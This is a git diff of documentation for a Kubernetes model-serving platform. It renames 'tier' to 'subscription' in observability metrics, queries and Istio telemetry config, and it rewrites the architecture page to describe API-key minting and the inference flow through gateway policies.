index edddb43aa..6e550af95 100644
--- a/docs/content/advanced-administration/observability.md
+++ b/docs/content/advanced-administration/observability.md
@@ -18,7 +18,7 @@ The observability stack consists of:
 
 - **Limitador**: Rate limiting service that exposes usage and rate-limit metrics (with labels from TelemetryPolicy)
 - **Authorino**: Authentication/authorization service that exposes auth evaluation metrics (`auth_server_*`)
-- **Istio Telemetry**: Adds `tier` to gateway latency metrics for per-tier latency (P50/P95/P99)
+- **Istio Telemetry**: Adds `subscription` to gateway latency metrics for per-subscription latency (P50/P95/P99)
 - **vLLM / llm-d / Simulator**: Expose inference metrics (TTFT, ITL, queue depth, token throughput, KV-cache usage); llm-d also exposes EPP routing metrics
 - **Prometheus**: Metrics collection and storage (uses OpenShift platform Prometheus)
 - **ServiceMonitors**: Deployed to configure Prometheus metric scraping
@@ -46,7 +46,7 @@ The observability stack is defined in `deployment/base/observability/`. It inclu
 | **TelemetryPolicy** (`gateway-telemetry-policy.yaml`) | Adds `user`, `tier`, and `model` labels to Limitador metrics. The `model` label (from `responseBodyJSON`) is available on `authorized_hits`; `authorized_calls` and `limited_calls` carry `user` and `tier`. |
 | **Istio Telemetry** (`istio-gateway-telemetry.yaml`) | Adds `tier` label to gateway latency (`istio_request_duration_milliseconds_bucket`) for per-tier P50/P95/P99. |
 
-**Deploy observability** (after Gateway and AuthPolicy are in place, so `X-MaaS-Tier` is injected):
+**Deploy observability** (after Gateway and AuthPolicy are in place, so `X-MaaS-Subscription` is injected):
 
     ./scripts/observability/install-observability.sh [--namespace NAMESPACE]
 
@@ -56,7 +56,7 @@ When using the full deployment script, this is applied automatically:
 
 !!! note "Prerequisites"
     - **Tools**: `kubectl`, `kustomize`, `jq`, `yq` must be installed
-    - **Cluster state**: Gateway, AuthPolicy (gateway-auth-policy), and tier lookup must be deployed first. The AuthPolicy injects `X-MaaS-Tier`, which Istio Telemetry reads to label latency by tier. Without it, the `tier` label on gateway latency will be empty.
+    - **Cluster state**: Gateway, AuthPolicy (gateway-auth-policy), and subscription selection must be deployed first. The AuthPolicy injects `X-MaaS-Subscription`, which Istio Telemetry reads to label latency by subscription. Without it, the `subscription` label on gateway latency will be empty.
     - **Namespace**: Use `--namespace` if your MaaS API is deployed to a namespace other than `maas-api` (e.g. `--namespace opendatahub`)
 
 **Optional:** The Istio gateway (Envoy) ServiceMonitor is included in `deployment/base/observability/` and deployed automatically by `install-observability.sh`.
@@ -81,14 +81,14 @@ When Kuadrant TelemetryPolicy and TokenRateLimitPolicy are applied, Limitador ex
 
 | Metric | Type | Labels | Description |
 |--------|------|--------|-------------|
-| `authorized_hits` | Counter | `user`, `tier`, `model`, `limitador_namespace` | Total tokens consumed per request (from `usage.total_tokens` in the model response; input + output combined). The `model` label is extracted via `responseBodyJSON("/model")`. |
-| `authorized_calls` | Counter | `user`, `tier`, `limitador_namespace` | Requests allowed (not rate-limited). |
-| `limited_calls` | Counter | `user`, `tier`, `limitador_namespace` | Requests denied due to token rate limits. |
+| `authorized_hits` | Counter | `user`, `subscription`, `model`, `limitador_namespace` | Total tokens consumed per request (from `usage.total_tokens` in the model response; input + output combined). The `model` label is extracted via `responseBodyJSON("/model")`. |
+| `authorized_calls` | Counter | `user`, `subscription`, `limitador_namespace` | Requests allowed (not rate-limited). |
+| `limited_calls` | Counter | `user`, `subscription`, `limitador_namespace` | Requests denied due to token rate limits. |
 
 !!! note "`model` label availability"
-    The `model` label is currently available **only on `authorized_hits`**. The `authorized_calls` and `limited_calls` metrics carry `user` and `tier` labels but not `model`, due to how the wasm-shim constructs the CEL evaluation context for these counters. This is a known upstream limitation tracked for improvement in Kuadrant.
+    The `model` label is currently available **only on `authorized_hits`**. The `authorized_calls` and `limited_calls` metrics carry `user` and `subscription` labels but not `model`, due to how the wasm-shim constructs the CEL evaluation context for these counters. This is a known upstream limitation tracked for improvement in Kuadrant.
 
-Gateway latency is labeled by **tier only** via Istio Telemetry (see [Per-Tier Latency Tracking](#per-tier-latency-tracking)); per-user latency is not exposed on the gateway histogram to keep cardinality bounded.
+Gateway latency is labeled by **subscription only** via Istio Telemetry (see [Per-Subscription Latency Tracking](#per-subscription-latency-tracking)); per-user latency is not exposed on the gateway histogram to keep cardinality bounded.
 
 ### Authorino Metrics
 
@@ -191,7 +191,7 @@ When using llm-d, the inference gateway's Endpoint Picker (EPP) exposes addition
     EPP metrics are not currently scraped or visualized by MaaS. When deploying llm-d with the EPP, refer to the [llm-d monitoring docs](https://llm-d.ai/docs/usage/monitoring) and the [inference gateway dashboard](https://github.com/kubernetes-sigs/gateway-api-inference-extension/blob/v1.0.1/tools/dashboards/inference_gateway.json) for EPP-specific visualization.
 
 !!! note "Input/Output Token Split"
-    vLLM metrics provide input vs output token breakdown **per model** (`vllm:prompt_tokens_total` / `vllm:generation_tokens_total` counters, or `vllm:request_prompt_tokens` / `vllm:request_generation_tokens` histograms). However, these do not carry `user` or `tier` labels. For per-user billing with input/output split, upstream changes to the Kuadrant wasm-shim are required (see [Known Limitations](#known-limitations)).
+    vLLM metrics provide input vs output token breakdown **per model** (`vllm:prompt_tokens_total` / `vllm:generation_tokens_total` counters, or `vllm:request_prompt_tokens` / `vllm:request_generation_tokens` histograms). However, these do not carry `user` or `subscription` labels. For per-user billing with input/output split, upstream changes to the Kuadrant wasm-shim are required (see [Known Limitations](#known-limitations)).
 
 #### Dashboard Metric Queries
 
@@ -277,11 +277,11 @@ Provides a comprehensive view of system health, usage across all users, and reso
 | **Component Health** | Limitador up, Authorino pods, MaaS API pods, Gateway pods, Firing Alerts |
 | **Key Metrics** | Total Tokens, Total Requests, Token Rate, Request Rate, Inference Success Rate, Active Users, P50 Response Latency, Rate Limit Ratio |
 | **Auth Evaluation** | Auth Evaluation Latency (P50/P95/P99), Auth Success/Deny Rate |
-| **Traffic Analysis** | Token/Request Rate by Model, Error Rates (4xx excl. 429, 5xx, 429 Rate Limited), Token/Request Rate by Tier, P95 Latency |
+| **Traffic Analysis** | Token/Request Rate by Model, Error Rates (4xx excl. 429, 5xx, 429 Rate Limited), Token/Request Rate by Subscription, P95 Latency |
 | **Error Breakdown** | Rate Limited Requests, Unauthorized Requests |
 | **Model Metrics** | vLLM queue depth, inference latency, KV cache usage, token throughput, prompt vs generation token ratio, queue wait time, TTFT, ITL |
 | **Top Users** | By token usage, by declined requests |
-| **Detailed Breakdown** | Token Rate by User, Request Volume by User & Tier |
+| **Detailed Breakdown** | Token Rate by User, Request Volume by User & Subscription |
 | **Resource Allocation** | CPU/Memory/GPU per model pod |
 
 !!! note "Template Variables"
@@ -306,7 +306,7 @@ Personal usage view for individual developers:
 |---------|---------|
 | **Usage Summary** | My Total Tokens, My Total Requests, Token Rate, Request Rate, Rate Limit Ratio, Inference Success Rate |
 | **Usage Trends** | Token Usage by Model, Usage Trends (tokens vs rate limited) |
-| **Detailed Analysis** | Token Volume by Model, Rate Limited by Tier |
+| **Detailed Analysis** | Token Volume by Model, Rate Limited by Subscription |
 
 !!! note "Inference Success Rate"
     Both dashboards use `rate()` on vLLM counters (`request_success_total`, `e2e_request_latency_seconds_count`) instead of raw counter values. This handles pod restarts correctly (counters reset independently and raw division produces incorrect results). When no traffic is present, `rate()/rate()` produces `NaN`; the dashboards use `((ratio) >= 0) OR vector(1)` to filter `NaN` and default to 100% (healthy) when no traffic exists.
@@ -315,7 +315,7 @@ Personal usage view for individual developers:
     Both dashboards show **token consumption** (`authorized_hits`) for billing/cost tracking and **request counts** (`authorized_calls`) for capacity planning. Blue panels indicate request metrics; green panels indicate token metrics.
 
 !!! tip "Per-User Token Billing"
-    The **Platform Admin dashboard** shows token consumption aggregated by **tier** and **model** for system-level visibility. Per-user token consumption for billing is available via:
+    The **Platform Admin dashboard** shows token consumption aggregated by **subscription** and **model** for system-level visibility. Per-user token consumption for billing is available via:
 
     - **AI Engineer dashboard**: Individual users see their own token usage
     - **Prometheus API**: Query `sum by (user) (increase(authorized_hits[24h]))` for billing periods
@@ -362,33 +362,33 @@ To import into Grafana:
 
 | Metric | Description | Labels |
 |--------|-------------|--------|
-| `authorized_hits` | Total tokens consumed (input + output combined, from `usage.total_tokens` in model responses) | `user`, `tier`, `model` |
-| `authorized_calls` | Total requests allowed | `user`, `tier` |
-| `limited_calls` | Total requests rate-limited | `user`, `tier` |
+| `authorized_hits` | Total tokens consumed (input + output combined, from `usage.total_tokens` in model responses) | `user`, `subscription`, `model` |
+| `authorized_calls` | Total requests allowed | `user`, `subscription` |
+| `limited_calls` | Total requests rate-limited | `user`, `subscription` |
 
 !!! tip "When to use which metric"
     - **Billing/Cost**: Use `authorized_hits` - represents actual token consumption, with `model` label for per-model breakdown
-    - **API Usage**: Use `authorized_calls` - represents number of API calls (per user, per tier)
-    - **Rate Limiting**: Use `limited_calls` - shows quota violations (per user, per tier)
+    - **API Usage**: Use `authorized_calls` - represents number of API calls (per user, per subscription)
+    - **Rate Limiting**: Use `limited_calls` - shows quota violations (per user, per subscription)
 
 !!! note "Total tokens only (input/output split not yet available)"
-    Token consumption is reported as **total tokens** (prompt + completion) per request. The pipeline reads `usage.total_tokens` from the model response via Kuadrant's TokenRateLimitPolicy. Separate input-token (`prompt_tokens`) and output-token (`completion_tokens`) counters are **not yet available** at the gateway level; this would require upstream changes in the Kuadrant wasm-shim to send separate `hits_addend` values for each token type. Chargeback and usage tracking per user, per subscription (tier), and per model are supported using `authorized_hits`.
+    Token consumption is reported as **total tokens** (prompt + completion) per request. The pipeline reads `usage.total_tokens` from the model response via Kuadrant's TokenRateLimitPolicy. Separate input-token (`prompt_tokens`) and output-token (`completion_tokens`) counters are **not yet available** at the gateway level; this would require upstream changes in the Kuadrant wasm-shim to send separate `hits_addend` values for each token type. Chargeback and usage tracking per user, per subscription, and per model are supported using `authorized_hits`.
 
 ### Latency Metrics
 
 | Metric | Description | Labels |
 |--------|-------------|--------|
-| `istio_request_duration_milliseconds_bucket` | Gateway-level latency histogram | `destination_service_name`, `tier` |
+| `istio_request_duration_milliseconds_bucket` | Gateway-level latency histogram | `destination_service_name`, `subscription` |
 | `vllm:e2e_request_latency_seconds` | Model inference latency | `model_name` |
 
-#### Per-Tier Latency Tracking
+#### Per-Subscription Latency Tracking
 
-The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to gateway latency metrics. This enables tracking request latency per access tier (e.g. free, premium, enterprise). Gateway latency is labeled by **tier only** (not by user) to keep metric cardinality bounded and to align with latency-by-tier requirements (e.g. P50/P95/P99 per tier). Per-user metrics remain available from Limitador (`authorized_hits`, `authorized_calls`, `limited_calls`).
+The MaaS Platform uses an Istio Telemetry resource to add a `subscription` dimension to gateway latency metrics. This enables tracking request latency per subscription (e.g. free, premium, enterprise). Gateway latency is labeled by **subscription only** (not by user) to keep metric cardinality bounded and to align with latency-by-subscription requirements (e.g. P50/P95/P99 per subscription). Per-user metrics remain available from Limitador (`authorized_hits`, `authorized_calls`, `limited_calls`).
 
 **How it works:**
 
-1. The `gateway-auth-policy` injects the `X-MaaS-Tier` header from the resolved tier
-2. The Istio Telemetry resource extracts this header and adds it as a `tier` label to the `REQUEST_DURATION` metric
+1. The `gateway-auth-policy` injects the `X-MaaS-Subscription` header from the resolved subscription
+2. The Istio Telemetry resource extracts this header and adds it as a `subscription` label to the `REQUEST_DURATION` metric
 3. Prometheus scrapes these metrics from the Istio gateway
 
 **Configuration** (`deployment/base/observability/istio-gateway-telemetry.yaml`):
@@ -396,7 +396,7 @@ The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to
     apiVersion: telemetry.istio.io/v1
     kind: Telemetry
     metadata:
-      name: latency-per-tier
+      name: latency-per-subscription
       namespace: openshift-ingress
     spec:
       selector:
@@ -410,12 +410,12 @@ The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to
             metric: REQUEST_DURATION
             mode: CLIENT_AND_SERVER
           tagOverrides:
-            tier:
+            subscription:
               operation: UPSERT
-              value: request.headers["x-maas-tier"]
+              value: request.headers["x-maas-subscription"]
 
 !!! note "Security"
-    The `X-MaaS-Tier` header should be injected server-side by AuthPolicy. Ensure your AuthPolicy injects this header from the tier lookup (not client input) for accurate metrics attribution.
+    The `X-MaaS-Subscription` header should be injected server-side by AuthPolicy. Ensure your AuthPolicy injects this header from the subscription selection (not client input) for accurate metrics attribution.
 
 ### Common Queries
 
@@ -430,16 +430,16 @@ The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to
     # Top 10 users by tokens consumed
     topk(10, sum by (user) (authorized_hits))
 
-    # Token consumption by tier
-    sum by (tier) (authorized_hits)
+    # Token consumption by subscription
+    sum by (subscription) (authorized_hits)
 
 **Request-based queries (capacity/usage):**
 
     # Total requests per user
     sum by (user) (authorized_calls)
 
-    # Request rate per tier (requests/sec)
-    sum by (tier) (rate(authorized_calls[5m]))
+    # Request rate per subscription (requests/sec)
+    sum by (subscription) (rate(authorized_calls[5m]))
 
     # Top 10 users by request count
     topk(10, sum by (user) (authorized_calls))
@@ -455,11 +455,11 @@ The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to
     # Rate limit ratio (percentage of requests rejected by rate limiting)
     (sum(limited_calls) / (sum(authorized_calls) + sum(limited_calls))) OR vector(0)
 
-    # Rate limit ratio by tier
-    (sum by (tier) (limited_calls) / (sum by (tier) (authorized_calls) + sum by (tier) (limited_calls))) OR vector(0)
+    # Rate limit ratio by subscription
+    (sum by (subscription) (limited_calls) / (sum by (subscription) (authorized_calls) + sum by (subscription) (limited_calls))) OR vector(0)
 
-    # Rate limit violations per second by tier
-    sum by (tier) (rate(limited_calls[5m]))
+    # Rate limit violations per second by subscription
+    sum by (subscription) (rate(limited_calls[5m]))
 
     # Users hitting rate limits most
     topk(10, sum by (user) (limited_calls))
@@ -472,11 +472,11 @@ The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to
     # P50 (median) latency
     histogram_quantile(0.5, sum by (le) (rate(istio_request_duration_milliseconds_bucket[5m])))
 
-    # P99 latency per tier
-    histogram_quantile(0.99, sum by (tier, le) (rate(istio_request_duration_milliseconds_bucket{tier!=""}[5m])))
+    # P99 latency per subscription
+    histogram_quantile(0.99, sum by (subscription, le) (rate(istio_request_duration_milliseconds_bucket{subscription!=""}[5m])))
 
-!!! tip "Filtering by tier"
-    For per-tier latency queries, use `tier!=""` to exclude requests where the `X-MaaS-Tier` header was not injected. Token consumption metrics (`authorized_hits`, `authorized_calls`) from Limitador already only include successful requests.
+!!! tip "Filtering by subscription"
+    For per-subscription latency queries, use `subscription!=""` to exclude requests where the `X-MaaS-Subscription` header was not injected. Token consumption metrics (`authorized_hits`, `authorized_calls`) from Limitador already only include successful requests.
 
 ## Maintenance
 
@@ -500,7 +500,7 @@ Some features require upstream changes and are currently blocked:
 
 | Feature | Blocker | Workaround |
 |---------|---------|------------|
-| **`model` label on `authorized_calls` / `limited_calls`** | Kuadrant wasm-shim does not pass `responseBodyJSON` context for these counters | Use `authorized_hits` for per-model breakdown; `authorized_calls`/`limited_calls` support per-user and per-tier |
+| **`model` label on `authorized_calls` / `limited_calls`** | Kuadrant wasm-shim does not pass `responseBodyJSON` context for these counters | Use `authorized_hits` for per-model breakdown; `authorized_calls`/`limited_calls` support per-user and per-subscription |
 | **Input/output token split** | Kuadrant TokenRateLimitPolicy sends a single `hits_addend` (total tokens); no mechanism for separate prompt/completion counters | Total tokens available via `authorized_hits`; the response body contains `usage.prompt_tokens` and `usage.completion_tokens` but the wasm-shim does not split them |
 | **Input/output token breakdown per user** | vLLM does not label its own metrics with `user` | Total tokens per user available via `authorized_hits{user="..."}`; vLLM prompt/generation token metrics are per-model only |
 | **Kuadrant policy health metrics** | `kuadrant_policies_enforced`, `kuadrant_policies_total` etc. are defined in Kuadrant dev but not yet shipped in RHCL 1.x | Enable `observability.enable: true` on the Kuadrant CR; the ServiceMonitors are created but policy-specific gauges will appear in a future operator release |
@@ -511,27 +511,27 @@ Some features require upstream changes and are currently blocked:
 !!! note "Total Tokens vs Token Breakdown"
     Total token consumption per user **is available** via `authorized_hits{user="..."}`. The blocked feature is the input/output split (prompt vs generation tokens) at the gateway level, which requires the wasm-shim to send two separate counter updates to Limitador.
 
-### Available Per-User and Per-Tier Metrics
+### Available Per-User and Per-Subscription Metrics
 
 | Feature | Metric | Label |
 |---------|--------|-------|
-| **Latency per tier** | `istio_request_duration_milliseconds_bucket` | `tier` |
+| **Latency per subscription** | `istio_request_duration_milliseconds_bucket` | `subscription` |
 | **Token consumption per user** | `authorized_hits` | `user` |
-| **Token consumption per tier** | `authorized_hits` | `tier` |
+| **Token consumption per subscription** | `authorized_hits` | `subscription` |
 | **Token consumption per model** | `authorized_hits` | `model` |
 | **Requests per user** | `authorized_calls` | `user` |
-| **Requests per tier** | `authorized_calls` | `tier` |
+| **Requests per subscription** | `authorized_calls` | `subscription` |
 | **Rate limited per user** | `limited_calls` | `user` |
-| **Rate limited per tier** | `limited_calls` | `tier` |
+| **Rate limited per subscription** | `limited_calls` | `subscription` |
 
 ### Requirements Alignment
 
 | Requirement | Status | Notes |
 |-------------|--------|-------|
-| **Usage dashboards** (token consumption per user, per subscription/tier, per model) | Met | Grafana dashboard + `authorized_hits` with `user`, `tier`, `model`; Prometheus scrapes Limitador `/metrics`. |
-| **Latency by tier** (P50/P95/P99) | Met | `istio_request_duration_milliseconds_bucket` with `tier` label; tier-only avoids unbounded cardinality. |
-| **Request tracking** (per user, per tier) | Met | `authorized_calls` with `user` and `tier` labels; `limited_calls` for rate-limit violations. |
-| **Export for chargeback** (CSV/API) | Not provided (RFE) | Per-user token data exists in Prometheus (`authorized_hits{user="..."}`) but no dedicated billing API or export endpoint is implemented. **RFE recommendation**: Add `/maas-api/v1/usage` endpoint that queries Prometheus and returns per-user, per-tier, per-model token consumption in CSV/JSON for finance and chargeback systems. |
+| **Usage dashboards** (token consumption per user, per subscription, per model) | Met | Grafana dashboard + `authorized_hits` with `user`, `subscription`, `model`; Prometheus scrapes Limitador `/metrics`. |
+| **Latency by subscription** (P50/P95/P99) | Met | `istio_request_duration_milliseconds_bucket` with `subscription` label; subscription-only avoids unbounded cardinality. |
+| **Request tracking** (per user, per subscription) | Met | `authorized_calls` with `user` and `subscription` labels; `limited_calls` for rate-limit violations. |
+| **Export for chargeback** (CSV/API) | Not provided (RFE) | Per-user token data exists in Prometheus (`authorized_hits{user="..."}`) but no dedicated billing API or export endpoint is implemented. **RFE recommendation**: Add `/maas-api/v1/usage` endpoint that queries Prometheus and returns per-user, per-subscription, per-model token consumption in CSV/JSON for finance and chargeback systems. |
 | **Input/output token split** | Not available | Only total tokens (`authorized_hits`); separate input and output counters require upstream Kuadrant wasm-shim changes to send split `hits_addend` values. |
 | **`model` label on request/rate-limit counters** | Partial | `model` available on `authorized_hits` only; requires upstream Kuadrant fix to propagate `responseBodyJSON` context to `authorized_calls`/`limited_calls` counters. |
 | **Policy enforcement health** | Future | Kuadrant operator metrics (`kuadrant_policies_enforced`, `kuadrant_ready`, etc.) defined upstream but not yet shipped in RHCL 1.x; `limitador_up` and `datastore_partitioned` are available now. |
diff --git a/docs/content/advanced-administration/subscription-cardinality.md b/docs/content/advanced-administration/subscription-cardinality.md
new file mode 100644
index 000000000..b9116728f
--- /dev/null
+++ b/docs/content/advanced-administration/subscription-cardinality.md
@@ -0,0 +1,14 @@
+# Subscription and Policy Cardinality
+
+MaaSAuthPolicy and MaaSSubscription support both `groups` and `users` in their subject/owner configuration. Using `users` for many individual human users can cause cardinality issues in the rate-limiting and policy enforcement layer (Limitador, Authorino), which may impact performance and scalability.
+
+**Recommendation:** Prefer `groups` for human users. Reserve the `users` field for Service Accounts and other programmatic identities where the number of distinct users remains small.
+
+!!! note "See also"
+    For configuration guidance, see [Quota and Access Configuration](../configuration-and-management/quota-and-access-configuration.md).
+
+## TODO
+
+- [ ] Document cardinality limits and observed impact
+- [ ] Provide guidance on when `users` is appropriate vs `groups`
+- [ ] Add monitoring and troubleshooting notes for cardinality-related issues
diff --git a/docs/content/api/openapi3.yaml b/docs/content/api/openapi3.yaml
new file mode 120000
index 000000000..0330b9a23
--- /dev/null
+++ b/docs/content/api/openapi3.yaml
@@ -0,0 +1 @@
+../../../maas-api/openapi3.yaml
\ No newline at end of file
diff --git a/docs/content/architecture.md b/docs/content/architecture.md
index f514f3c6b..183420d5b 100644
--- a/docs/content/architecture.md
+++ b/docs/content/architecture.md
@@ -2,232 +2,293 @@
 
 ## Overview
 
-The MaaS Platform is designed as a cloud-native, Kubernetes-based solution that provides policy-based access control, rate limiting, and tier-based subscriptions for AI model serving. The architecture follows microservices principles and leverages OpenShift/Kubernetes native components for scalability and reliability.
+The MaaS Platform is a Kubernetes-native layer for AI model serving built on [Gateway API](https://gateway-api.sigs.k8s.io/) and policy controllers ([Kuadrant](https://docs.kuadrant.io/), [Authorino](https://docs.kuadrant.io/1.0.x/authorino/), [Limitador](https://docs.kuadrant.io/1.0.x/limitador/)). It provides policy-based authentication and authorization, plus subscription-based rate limiting. Future work includes improved request routing and discovery.
 
 ## Architecture
 
 ### 🏗️ High-Level Architecture
 
-The MaaS Platform is an end-to-end solution that leverages Kuadrant (Red Hat Connectivity Link) and Open Data Hub (Red Hat OpenShift AI)'s Model Serving capabilities to provide a fully managed, scalable, and secure self-service platform for AI model serving.
+The MaaS Platform is an end-to-end solution built on [Kuadrant](https://docs.kuadrant.io/).
 
-**All requests flow through the maas-default-gateway and RHCL components**, which then route requests based on the path:
+All traffic flows through the Gateway    **maas-default-gateway** (Gateway API). Then utilizes [Authorino](https://docs.kuadrant.io/1.0.x/authorino/) to enforcing authentication, authorization and [Limitador](https://docs.kuadrant.io/1.0.x/limitador/) to enforce and track token usage. Auth policies use **caching** (e.g., subscription selection results, API key validation) to reduce latency on the hot path.
 
-- `/maas-api/*` requests → MaaS API (token retrieval, validates OpenShift Token via RHCL)
-- Inference requests (`/v1/models`, `/v1/chat/completions`) → Model Serving (validates Service Account Token via RHCL)
+**Main Flows:**
+
+- **Key Minting** — For obtaining API keys to authenticate programmatic access. 
+- **Inference** — For calling models to generate completions.
 
 ```mermaid
 graph TB
-    subgraph "User Layer"
-        User[Users]
+    subgraph UserLayer["User Layer"]
+        User[User]
     end
     
-    subgraph "Gateway & Policy Layer"
-        GatewayAPI["maas-default-gateway<br/>All Traffic Entry Point"]
-        AuthPolicy["<b>Auth Policy</b><br/>Authorino<br/>Token Validation"]
-        RateLimit["<b>Rate Limiting</b><br/>Limitador<br/>Usage Quotas"]
+    subgraph GatewayPolicyLayer["Gateway & Policy Layer"]
+        Gateway[Gateway]
+        AuthPolicy[AuthPolicy]
+        MaaSAuthPolicy[MaaSAuthPolicy]
+        MaaSSubscription[MaaSSubscription]
     end
     
-    subgraph "Token Management Path"
-        MaaSAPI["MaaS API<br/>Token Retrieval"]
+    subgraph TokenManagementLayer["Token Management Layer"]
+        MaaSAPI[MaaS API]
     end
     
-    subgraph "Model Serving Path"
-        PathInference["Inference Service"]
-        ModelServing["RHOAI Model Serving"]
+    subgraph ModelServingLayer["Model Serving Layer"]
+        InferenceService[Inference Service]
+        LLM[LLM]
     end
     
-    User -->|"All Requests"| GatewayAPI
-    GatewayAPI -->|"All Traffic"| AuthPolicy
+    User -->|"Request Key"| Gateway
+    Gateway --> AuthPolicy
+    AuthPolicy --> MaaSAPI
+    MaaSAPI -->|"Return API Key"| User
     
-    AuthPolicy -->|"/maas-api<br/>Auth Only"| MaaSAPI
-    MaaSAPI -->|"Returns Token"| User
+    User -->|"Inference"| Gateway
+    Gateway --> MaaSAuthPolicy
+    MaaSAuthPolicy -.->|"Validate API Key"| MaaSAPI
+    MaaSAuthPolicy -->|"Rate Limit"| MaaSSubscription
+    MaaSSubscription --> InferenceService
+    InferenceService --> LLM
+    LLM -->|"Return Response"| User
     
-    AuthPolicy -->|"Inference Traffic<br/>Auth + Rate Limit"| RateLimit
-    RateLimit --> PathInference
-    PathInference --> ModelServing
-    ModelServing -->|"Returns Response"| User
+    linkStyle 0,1,2,3 stroke:#1976d2,stroke-width:2px
+    linkStyle 4,5,6,7,8,9,10 stroke:#388e3c,stroke-width:2px
     
     style MaaSAPI fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff
-    style GatewayAPI fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff
-    style AuthPolicy fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff
-    style RateLimit fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff
-    style PathInference fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
-    style ModelServing fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
+    style Gateway fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff
+    style AuthPolicy fill:#e65100,stroke:#333,stroke-width:2px,color:#fff
+    style MaaSAuthPolicy fill:#e65100,stroke:#333,stroke-width:2px,color:#fff
+    style MaaSSubscription fill:#e65100,stroke:#333,stroke-width:2px,color:#fff
+    style InferenceService fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
+    style LLM fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
+```
+
+### Key Minting Flow — Request & Validation
+
+**Flow summary:**
+
+1. User sends `POST /v1/api-keys` with Bearer `{oc-token}`.
+2. Gateway routes the request to AuthPolicy (Authorino).
+3. AuthPolicy validates the OpenShift token via TokenReview.
+4. Gateway forwards the authenticated request and user context to the Key Minting Service.
+
+```mermaid
+graph TB
+    subgraph UserLayer["User"]
+        U[User]
+    end
+    
+    subgraph GatewayLayer["Gateway & Policy"]
+        G[Gateway]
+        AP[AuthPolicy<br/>Authorino]
+    end
+    
+    subgraph KeyMintingLayer["MaaS API"]
+        KMS[MaaS API]
+    end
+    
+    U -->|"1. POST /v1/api-keys<br/>Bearer {oc-token}"| G
+    G -->|"2. Route /maas-api"| AP
+    AP -->|"3. TokenReview<br/>validate OpenShift token"| G
+    G -->|"4. Forward + user context"| KMS
+    
+    style KMS fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff
+    style G fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff
+    style AP fill:#e65100,stroke:#333,stroke-width:2px,color:#fff
 ```
 
-### Architecture Details
+!!! Tip "Future Plans"
+    Today, validation uses the **OpenShift token flow** (TokenReview). Future plans include optional integration with other OIDC providers (e.g., external IdPs, Keycloak).
 
-The MaaS Platform architecture is designed to be modular and scalable. It is composed of the following components:
 
-- **maas-default-gateway**: The single entry point for all traffic (both token requests and inference requests).
-- **RHCL (Red Hat Connectivity Link)**: The policy engine that handles authentication and authorization for all requests. Routes requests to appropriate backend based on path:
-  - `/maas-api/*` → MaaS API (validates OpenShift tokens)
-  - Inference paths (`/v1/models`, `/v1/chat/completions`) → Model Serving (validates Service Account tokens)
-- **MaaS API**: The central component for token generation and management, accessed via `/maas-api` path.
-- **Open Data Hub (Red Hat OpenShift AI)**: The model serving platform that handles inference requests.
+### Key Minting Service (Default Implementation)
 
-### Detailed Component Architecture
+**Flow summary:**
 
-#### MaaS API Component Details
+1. Gateway forwards the authenticated request and user context to the Key Minting Service (MaaS API).
+2. The service generates a random `sk-oai-*` key and hashes it with SHA-256.
+3. Only the hash and metadata (username, groups, name, optional `expiresAt` when TTL is set) are stored in PostgreSQL.
+4. The plaintext key is returned to the user **once**, along with `expiresAt` when a TTL was specified; the key cannot be retrieved again.
 
-The MaaS API provides a self-service platform for users to request tokens for their inference requests. All requests to the MaaS API pass through the `maas-default-gateway` where authentication is performed against the user's OpenShift token via the Auth Policy component. By leveraging Kubernetes native objects like ConfigMaps and ServiceAccounts, it offers model owners a simple way to configure access to their models based on a familiar group-based access control model.
+Keys can be permanent (no expiration) or have an optional **TTL** (`expiresIn`, e.g., `30d`, `90d`, `1h`); the response includes `expiresAt` when a TTL is set.
 
 ```mermaid
 graph TB
-    subgraph "External Access"
-        User[Users]
-        AdminUI[Admin/User UI]
+    subgraph UserLayer["User"]
+        U[User]
     end
     
-    subgraph "Gateway & Auth"
-        Gateway[**maas-default-gateway**<br/>Entry Point]
-        AuthPolicy[**Auth Policy**<br/>Validates OpenShift Token]
+    subgraph GatewayLayer["Gateway & Policy"]
+        G[Gateway]
     end
     
-    subgraph "MaaS API Service"
-        API[**MaaS API**<br/>Go + Gin Framework]
-        TierMapping[**Tier Mapping Logic**]
-        TokenGen[**Service Account Token Generation**]
+    subgraph KeyMintingService["Key Minting Service (Default)"]
+        API[MaaS API]
+        Gen[Generate sk-oai-* key]
+        Hash[Hash with SHA-256]
     end
     
-    subgraph "Configuration"
-        ConfigMap[**ConfigMap**<br/>tier-to-group-mapping]
-        K8sGroups[**Kubernetes Groups**<br/>tier-free-users<br/>tier-premium-users<br/>tier-enterprise-users]
+    subgraph Storage["Storage (Default)"]
+        DB[(PostgreSQL<br/>key hashes + metadata + TTL)]
     end
     
-    subgraph "free namespace"
-        FreeSA1[**ServiceAccount**<br/>freeuser1-sa]
-        FreeSA2[**ServiceAccount**<br/>freeuser2-sa]
+    U --> G
+    G -->|"Forward + user context"| API
+    API --> Gen
+    Gen --> Hash
+    Hash -->|"Store hash + expiresAt"| DB
+    API -->|"Return key ONCE"| U
+    
+    style API fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff
+    style G fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff
+    style DB fill:#336791,stroke:#333,stroke-width:2px,color:#fff
+```
+
+!!! tip "Future Plans"
+    This is the **default implementation**. Future plans include integration with other key store providers (e.g., HashiCorp Vault, cloud secret managers).
+
+!!! note "PostgreSQL"
+    A **PostgreSQL database is required** and is **not included** with the MaaS deployment. The deploy script provides a basic PostgreSQL deployment for development and testing—**this is not intended for production use**. For production, provision and configure your own PostgreSQL instance.
+
+### Inference Flow — Through MaaS Objects
+
+**Flow summary:**
+
+1. User sends inference request with an API key.
